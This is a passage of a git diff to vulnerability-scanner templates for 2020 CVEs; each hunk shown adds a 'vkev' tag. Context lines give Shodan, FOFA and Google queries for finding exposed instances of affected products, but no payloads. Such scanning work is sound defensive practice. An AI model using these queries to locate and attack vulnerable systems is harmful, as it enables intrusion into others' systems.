--git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 5a644caa607..486974c826f 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev + tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index c90ed1be76b..dedcfdd5c85 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -30,7 +30,7 @@ info: max-request: 1 vendor: apache product: unomi - tags: cve,cve2020,apache,rce + tags: cve,cve2020,apache,rce,vkev variables: id: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index f0124a5c86f..2c39a74b09d 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -36,7 +36,7 @@ info: - title="weblogic" - body="weblogic application server" google-query: intitle:"weblogic" - tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm + tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 672ea7c324c..2db85c7107b 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"oracle business intelligence sign in" fofa-query: title="oracle business intelligence sign in" google-query: intitle:"oracle business intelligence sign in" - tags: cve,cve2020,oracle,lfi,kev,packetstorm + tags: cve,cve2020,oracle,lfi,kev,packetstorm,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index ee7bc66ea34..0564b4cb82c 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve2020,cve,oracle,rce,weblogic,oast,kev + tags: cve2020,cve,oracle,rce,weblogic,oast,kev,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 20f36fd8ecb..0f267e5c4db 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -34,7 +34,7 @@ info: - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm + tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm,vkev variables: str: "{{randstr}}" revstr: "{{reverse(str)}}" diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index a5a4fc228cf..2d627bbcf4f 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -31,7 +31,7 @@ info: fofa-query: - app="nette-Framework" - app="nette-framework" - tags: cve2020,cve,nette,rce + tags: cve2020,cve,nette,rce,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-15415.yaml b/http/cves/2020/CVE-2020-15415.yaml index 895be11732d..7ff65406e53 100644 --- a/http/cves/2020/CVE-2020-15415.yaml +++ b/http/cves/2020/CVE-2020-15415.yaml @@ -25,7 +25,7 @@ info: vendor: draytek product: vigor fofa-query: '"excanvas.js" && "lang == \"zh-cn\"" && "detectLang" && server=="DWS"' - tags: cve,cve2020,draytek,rce,router,kev + tags: cve,cve2020,draytek,rce,router,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index e9319517786..7bcdac20982 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -31,7 +31,7 @@ info: max-request: 1 vendor: mobileiron product: core - tags: cve,cve2020,mobileiron,rce,sentry,kev + tags: cve,cve2020,mobileiron,rce,sentry,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index a39f2655a5a..65609398463 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -28,7 +28,7 @@ info: vendor: terra-master product: tos fofa-query: '"terramaster" && header="tos"' - tags: cve2020,cve,terramaster,rce,terra-master + tags: cve2020,cve,terramaster,rce,terra-master,vkev variables: filename: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index f75d07e34d3..9e823031bb9 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: midasolutions product: eframework - tags: cve2020,cve,mida,rce,packetstorm,midasolutions + tags: cve2020,cve,mida,rce,packetstorm,midasolutions,vkev http: - method: POST diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index 192bb752c08..2d1223975bc 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: unified_ip_conference_station_7937g_firmware - tags: cve,cve2020,dos,cisco,packetstorm + tags: cve,cve2020,dos,cisco,packetstorm,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index e9316161e03..5f9a74f0d7a 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: saltstack product: salt - tags: cve2020,cve,vulhub,saltstack,kev + tags: cve2020,cve,vulhub,saltstack,kev,vkev variables: priv: "{{to_lower(rand_text_alpha(5))}}" roaster: "{{to_lower(rand_text_alpha(6))}}" diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 2534801b485..35cda078c26 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: cve2020,cve,xss,wso2 + tags: cve2020,cve,xss,wso2,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 3877ff23b7a..b138ab4ddc8 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: seowonintech product: slc-130 - tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech + tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech,vkev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index ebc44ed5b96..4df21f2e2f7 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"fuel cms" fofa-query: title="fuel cms" google-query: intitle:"fuel cms" - tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio + tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 2b5a81aed3a..d6e1d0b7e73 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -38,7 +38,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists + tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 5a3b5ffe8cc..f690a562561 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: articatech product: web_proxy - tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech + tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 462a2939f9f..f5cbd05e3b3 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: articatech product: web_proxy - tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli + tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index af8d00c46ef..b2e62ae3cc7 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: apache product: flink - tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive + tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 2c7413a0628..5c3767f0f44 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: apache product: flink - tags: cve,cve2020,apache,lfi,flink,kev + tags: cve,cve2020,apache,lfi,flink,kev,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index f058cf258ef..75c0cab382b 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -36,7 +36,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2020,apache,rce,struts,kev,packetstorm + tags: cve,cve2020,apache,rce,struts,kev,packetstorm,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 2305334c706..80caa0f2f1b 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="ofbiz" - app="apache_ofbiz" - tags: cve2020,cve,apache,xss,ofbiz + tags: cve2020,cve,apache,xss,ofbiz,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index 74266e6e52f..47849b82275 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -31,7 +31,7 @@ info: product: kylin shodan-query: http.favicon.hash:-186961397 fofa-query: icon_hash=-186961397 - tags: cve,cve2020,apache,kylin,rce,oast,kev + tags: cve,cve2020,apache,kylin,rce,oast,kev,vkev variables: username: "{{username}}:" password: "{{password}}" diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index 4db0dacac4f..72730ac6122 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: gridx_project product: gridx - tags: cve2020,cve,gridx,rce,gridx_project + tags: cve2020,cve,gridx,rce,gridx_project,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index bbf1860ff22..d84d572a8d4 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="weiphp" - body="weiphp5.0" - tags: cve,cve2020,weiphp,sql,sqli + tags: cve,cve2020,weiphp,sql,sqli,vkev http: - method: POST diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 430816f8e5b..2c2e9432feb 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -33,7 +33,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm + tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index 95ced3084b9..dcf779a57db 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: inspur product: clusterengine - tags: cve2020,cve,clusterengine,rce,inspur + tags: cve2020,cve,clusterengine,rce,inspur,vkev http: - method: POST diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index a1d7d521489..6075bc71f59 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="74cms" - body="74cms" - tags: cve2020,cve,74cms,sqli + tags: cve2020,cve,74cms,sqli,vkev variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index cb417f3a5f5..42b2def1862 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="74cms" - body="74cms" - tags: cve,cve2020,74cms,sqli + tags: cve,cve2020,74cms,sqli,vkev variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index 2325f40cbf4..c912cd23374 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -28,7 +28,7 @@ info: product: d-copia253mf_plus_firmware shodan-query: http.favicon.hash:-50306417 fofa-query: icon_hash=-50306417 - tags: cve2020,cve,printer,iot,lfi,edb,kyocera + tags: cve2020,cve,printer,iot,lfi,edb,kyocera,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-23814.yaml b/http/cves/2020/CVE-2020-23814.yaml index a09961aa83b..8737e3f0ba4 100644 --- a/http/cves/2020/CVE-2020-23814.yaml +++ b/http/cves/2020/CVE-2020-23814.yaml @@ -28,7 +28,7 @@ info: fofa-query: - app="xxl-job" - icon_hash=1691956220 - tags: cve,cve2020,xxl-job,xss,authenticated + tags: cve,cve2020,xxl-job,xss,authenticated,vkev flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 3b0ed81d7ef..ae8fd39cfd1 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -30,7 +30,7 @@ info: vendor: gmapfp product: gmapfp framework: joomla\! - tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\! + tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!,vkev variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index a4b8b379c7d..79012e8e325 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: cve2020,cve,wso2,xxe,oast,blind + tags: cve2020,cve,wso2,xxe,oast,blind,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 4c6573c80d9..1abfb7d1021 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: php-fusion product: php-fusion - tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion + tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 87886335a98..b784823c64e 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dlink product: dcs-2530l_firmware - tags: cve,cve2020,dlink,kev + tags: cve,cve2020,dlink,kev,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index b6f8a7d7741..abd2e46cfc9 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -30,7 +30,7 @@ info: vendor: webdesi9 product: file_manager framework: wordpress - tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9 + tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index c61d9ef37ac..aca782951a3 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" - tags: cve,cve2020,sophos,rce,oast,unauth,kev + tags: cve,cve2020,sophos,rce,oast,unauth,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index feef1012358..cb45b40f163 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -29,7 +29,7 @@ info: product: dns-320_firmware shodan-query: http.html:"sharecenter" fofa-query: body="sharecenter" - tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev + tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev,vkev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 61d1a16454f..2640265951a 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve2020,cve,oracle,weblogic,rce,unauth,kev + tags: cve2020,cve,oracle,weblogic,rce,unauth,kev,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 6e418bc7129..1e6bc72fdd3 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: thinkadmin product: thinkadmin - tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog + tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index 66c8c834457..be3a591ab5e 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -19,7 +19,7 @@ info: epss-percentile: 0.99541 metadata: max-request: 1 - tags: cve,cve2020,cisco,lfi + tags: cve,cve2020,cisco,lfi,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index e58009ef771..ea14bf7993a 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -28,7 +28,7 @@ info: vendor: wpcoursesplugin product: wp-courses framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb,wpcoursesplugin + tags: cve,cve2020,wordpress,wp-plugin,exposure,edb,wpcoursesplugin,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-26879.yaml b/http/cves/2020/CVE-2020-26879.yaml index 8cc40fc46e9..706a25a6c8c 100644 --- a/http/cves/2020/CVE-2020-26879.yaml +++ b/http/cves/2020/CVE-2020-26879.yaml @@ -27,7 +27,7 @@ info: vendor: commscope product: ruckus_vriot shodan-query: html:"RIoT Controller" - tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass + tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass,vkev variables: username: "{{randstr_1}}" diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index d1a17a93c8b..692765bda51 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netgear product: jgs516pe_firmware - tags: cve,cve2020,netgear,rce,oast,router,unauth,kev + tags: cve,cve2020,netgear,rce,oast,router,unauth,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 5ea5f0d3715..545d3cc35b6 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -27,7 +27,7 @@ info: vendor: goodlayers product: good_learning_management_system framework: wordpress - tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress + tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-27615.yaml b/http/cves/2020/CVE-2020-27615.yaml index 26bbbfa0b60..1349f8cfa3d 100644 --- a/http/cves/2020/CVE-2020-27615.yaml +++ b/http/cves/2020/CVE-2020-27615.yaml @@ -26,7 +26,7 @@ info: product: loginizer framework: wordpress publicwww-query: "/wp-content/plugins/loginizer" - tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,loginizer,sqli,time-based + tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,loginizer,sqli,time-based,vkev variables: password: "{{rand_base(8)}}" diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 6dd9dbad0c0..b1361592472 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -39,7 +39,7 @@ info: - intitle:"icewarp server administration" - intitle:"icewarp" - powered by icewarp 10.4.4 - tags: cve,cve2020,xss,icewarp,packetstorm + tags: cve,cve2020,xss,icewarp,packetstorm,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index dadbec24e4a..6c79e07f9cf 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: sonarsource product: sonarqube - tags: cve,cve2020,sonarqube,sonarsource + tags: cve,cve2020,sonarqube,sonarsource,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 62c8c910fcc..f7bc8e585f2 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -31,7 +31,7 @@ info: fofa-query: - '"TerraMaster" && header="TOS"' - '"terramaster" && header="tos"' - tags: cve2020,cve,terramaster,enum,tos,terra-master + tags: cve2020,cve,terramaster,enum,tos,terra-master,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index bc17a15bdb6..50b1403035b 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -28,7 +28,7 @@ info: vendor: terra-master product: tos fofa-query: '"terramaster" && header="tos"' - tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master + tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master,vkev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-29047.yaml b/http/cves/2020/CVE-2020-29047.yaml index 5e482fd8d0e..11a58cb7863 100644 --- a/http/cves/2020/CVE-2020-29047.yaml +++ b/http/cves/2020/CVE-2020-29047.yaml @@ -25,7 +25,7 @@ info: product: wp_hotel_booking framework: wordpress fofa-query: body="wp-content/plugins/wp-hotel-booking" - tags: cve,cve2020,wordpress,wp-plugin,wp,wp-hotel-booking,rce,thimpress + tags: cve,cve2020,wordpress,wp-plugin,wp,wp-hotel-booking,rce,thimpress,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 6541fd09a54..6c520f79cad 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -28,7 +28,7 @@ info: product: car_rental_management_system shodan-query: http.html:"car rental management system" fofa-query: body="car rental management system" - tags: cve,cve2020,lfi,car_rental_management_system_project,sqli + tags: cve,cve2020,lfi,car_rental_management_system_project,sqli,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-29390.yaml b/http/cves/2020/CVE-2020-29390.yaml index ee7fe09ea21..16d260d7049 100644 --- a/http/cves/2020/CVE-2020-29390.yaml +++ b/http/cves/2020/CVE-2020-29390.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"zeroshell" fofa-query: title="zeroshell" google-query: intitle:"zeroshell" - tags: cve,cve2020,zeroshell,rce,router + tags: cve,cve2020,zeroshell,rce,router,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index d1673c63e41..465f901518d 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -34,7 +34,7 @@ info: - http.title:"usg flex 100" fofa-query: title="usg flex 100" google-query: intitle:"usg flex 100" - tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev + tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index 0a7ed621fa9..3048fca3cad 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: incomcms_project product: incomcms - tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project + tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index 5d766a82218..360f50e61cb 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: firepower_threat_defense - tags: cve,cve2020,cisco,packetstorm + tags: cve,cve2020,cisco,packetstorm,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 0db474e875b..7b249ce61b4 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -30,7 +30,7 @@ info: max-request: 2 vendor: cisco product: asa_5505 - tags: cve,cve2020,lfi,kev,packetstorm,cisco + tags: cve,cve2020,lfi,kev,packetstorm,cisco,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-35131.yaml b/http/cves/2020/CVE-2020-35131.yaml index ca0319add7d..e243ccc3f4d 100644 --- a/http/cves/2020/CVE-2020-35131.yaml +++ b/http/cves/2020/CVE-2020-35131.yaml @@ -26,7 +26,7 @@ info: fofa-query: app="Cockpit" max-request: 2 verified: true - tags: cve,cve2020,rce,cockpit + tags: cve,cve2020,rce,cockpit,vkev variables: rand_user: '{{rand_text_alpha(5)}}' diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 62735e58183..8a5babffd9e 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -27,7 +27,7 @@ info: vendor: wp-ecommerce product: easy_wp_smtp framework: wordpress - tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce + tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 2e2ee2fbfa6..d7bad3b2211 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -31,7 